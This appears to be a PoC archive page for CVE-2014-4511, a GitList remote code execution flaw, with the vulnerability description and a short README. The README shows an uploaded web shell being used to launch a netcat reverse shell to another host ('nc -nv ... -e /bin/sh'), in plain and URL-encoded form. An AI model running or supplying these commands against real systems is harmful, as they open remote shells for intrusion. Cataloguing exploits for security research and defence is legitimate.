Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2014-4511 PoC — GitList 远程代码执行漏洞

Source
https://github.com/michaelsss1/gitlist-RCE
Associated Vulnerability
Title:GitList 远程代码执行漏洞 (CVE-2014-4511)
Description:Gitlist before 0.5.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the file name in the URI of a request for a (1) blame, (2) file, or (3) stats page, as demonstrated by requests to blame/master/, master/, and stats/master/.
Description
CVE-2014-4511
Readme
# gitlist-RCE
CVE-2014-4511
example:
after shell upload successfully:
access:
http://192.168.1.126/cache/x.php/?cmd=nc -nv 192.168.1.127 1111 -e /bin/sh
http://192.168.1.126/cache/x.php/?cmd=nc%20-nv%20192.168.1.127%201111%20-e%20/bin/sh
File Snapshot

 [4.0K]  /data/pocs/aafeb171682f85ab5cde076b8c47423ab41019ed
├── [ 817]  gitlistRCE
└── [ 238]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →